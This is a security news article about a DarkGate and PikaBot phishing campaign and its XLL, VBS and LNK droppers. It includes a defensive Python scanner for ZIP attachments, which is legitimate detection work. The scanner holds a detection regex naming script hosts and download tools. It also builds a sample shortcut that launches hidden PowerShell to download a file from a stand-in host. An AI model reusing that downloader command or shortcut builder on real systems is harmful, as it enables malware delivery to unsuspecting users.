An advanced phishing campaign pushing the DarkGate malware has recently added the PikaBot malware to the mix, making it the most sophisticated phishing campaign since the Qakbot operation was dismantled.
The malicious email campaign began in September 2023, after the FBI seized and took down QBot's (Qakbot) infrastructure.
In a new report by Cofense, researchers explain that the DarkGate and PikaBot campaigns use tactics and techniques similar to previous Qakbot campaigns, indicating that the Qbot threat actors have now moved on to the newer malware botnets.
As Qbot was one of the most pervasive malware botnets distributed via email, and both DarkGate and PikaBot are modular malware loaders with many of the same features as Qbot, this poses a serious risk to the enterprise.
Like Qbot, the new malware loaders will likely be used by threat actors to gain initial access to networks and then to carry out ransomware, espionage, and data theft attacks.
The DarkGate and PikaBot campaign
Over the summer, there was a large increase in malicious emails pushing the DarkGate malware, with the threat actors switching to installing PikaBot as the primary payload in October 2023.
The phishing attack begins with an email that is a reply to, or a forward of, a stolen discussion thread, which increases the likelihood that recipients will trust the communication.
Users who click the embedded URL go through a series of checks that verify they are valid targets and are then prompted to download a ZIP archive containing a malware dropper, which fetches the final payload from a remote resource.
Cofense reports that the attackers experimented with multiple initial malware droppers to determine which works best, including:
- An Excel-DNA loader based on an open-source project used for creating XLL files, abused here to download and run malware.
- VBS (Visual Basic Script) downloaders that can execute malware via .vbs files in Microsoft Office documents or invoke command-line executables.
- LNK downloaders that abuse Microsoft shortcut files (.lnk) to download and execute malware.
The final payload used in these attacks was the DarkGate malware through September 2023, which was replaced by PikaBot in October 2023.
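A defender's first practical question about the chain above is how to triage the ZIP attachment before a user opens it. The following is an added example (not Cofense's tooling and not code from the report) that unpacks a ZIP in memory, flags the three dropper types named above by extension, and, for .lnk members, parses the shell-link header and StringData according to the public MS-SHLLINK layout to surface a relative path or command-line arguments that point at a script host or a URL. The list of living-off-the-land binaries and the sample shortcut are assumptions constructed for the demonstration, not artifacts from the campaign.

```python
import io
import re
import struct
import zipfile

# LinkFlags bits from the MS-SHLLINK specification (public Microsoft documentation).
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# Dropper types the campaign used, plus an assumed (not from the report) list of
# script hosts and download utilities worth flagging inside a shortcut.
DROPPER_EXTENSIONS = (".xll", ".vbs", ".lnk")
LOLBIN_RE = re.compile(
    r"\b(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32|certutil|bitsadmin|curl)\b"
    r"|https?://",
    re.IGNORECASE,
)


def parse_lnk(data: bytes) -> dict:
    """Parse the ShellLinkHeader and StringData of a .lnk; raise ValueError if not a shell link."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("bad HeaderSize")
    if data[4:20] != LNK_CLSID:
        raise ValueError("bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    out = {"flags": flags}
    # StringData sections appear in this fixed order, each only if its flag is set.
    for flag, key in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, not bytes
        pos += 2
        nbytes = count * 2 if unicode else count
        raw = data[pos:pos + nbytes]
        pos += nbytes
        out[key] = raw.decode("utf-16-le" if unicode else "cp1252", errors="replace")
    return out


def lnk_findings(info: dict) -> list:
    """Return human-readable reasons a parsed shortcut looks like a downloader."""
    findings = []
    for key in ("relative_path", "working_dir", "arguments", "icon_location"):
        value = info.get(key, "")
        if LOLBIN_RE.search(value):
            findings.append(f"{key} references a script host or URL: {value!r}")
    return findings


def scan_zip_attachment(zip_bytes: bytes) -> list:
    """Return (member_name, reason) tuples for dropper-like members of a ZIP attachment."""
    results = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for member in zf.infolist():
            name = member.filename
            lower = name.lower()
            if lower.endswith(DROPPER_EXTENSIONS):
                results.append((name, f"dropper file type {lower.rsplit('.', 1)[-1]}"))
            if lower.endswith(".lnk"):
                try:
                    info = parse_lnk(zf.read(member))
                except ValueError as exc:
                    results.append((name, f"malformed shell link: {exc}"))
                    continue
                results.extend((name, reason) for reason in lnk_findings(info))
    return results


def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Build a minimal Unicode shortcut carrying only RELATIVE_PATH and COMMAND_LINE_ARGUMENTS.
    Constructed for the sample below; a real campaign shortcut carries more sections."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<I", flags)
    header += b"\x00" * (0x4C - len(header))  # attributes, timestamps, size, icon, show, hotkey, reserved

    def string_data(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + string_data(relative_path) + string_data(arguments)


# Constructed sample attachment (not a real campaign artifact): a shortcut that would
# launch PowerShell to fetch a second stage, beside a harmless text file.
_buf = io.BytesIO()
with zipfile.ZipFile(_buf, "w") as _zf:
    _zf.writestr("Invoice_2023-10.lnk",
                 build_lnk("..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                           "-w hidden -c \"iwr http://example.invalid/x.zip -o $env:TEMP\\x.zip\""))
    _zf.writestr("readme.txt", "nothing to see here")
SAMPLE_ZIP = _buf.getvalue()

if __name__ == "__main__":
    for name, reason in scan_zip_attachment(SAMPLE_ZIP):
        print(f"{name}: {reason}")
```

The parser deliberately stops after StringData and never resolves or executes the target; it only reads the fields a downloader shortcut must carry to work. Extension checks alone are weak (the XLL and VBS cases are caught only by name here), so in a mail gateway this would sit beside content inspection of those types as well.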
DarkGate and PikaBot
DarkGate was first documented in 2017, but it only became available to the wider cybercrime community this past summer, resulting in a spike in its distribution via phishing and malvertising.
It is an advanced modular malware that supports a variety of malicious behaviors, including hVNC for remote access, cryptocurrency mining, a reverse shell, keylogging, clipboard stealing, and information stealing (files, browser data).
PikaBot is a newer malware first spotted in early 2023 that consists of a loader and a core module, incorporating extensive anti-debugging, anti-VM, and anti-emulation mechanisms.
The malware profiles infected systems and sends the data to its command and control (C2) infrastructure, then awaits further instructions.
The C2 sends commands instructing the malware to download and execute modules in the form of DLL or PE files, shellcode, or command-line commands, making it a versatile tool.
Cofense warns that the PikaBot and DarkGate campaigns are run by skilled threat actors whose abilities are above those of common phishers, so organizations should familiarize themselves with the TTPs of this campaign.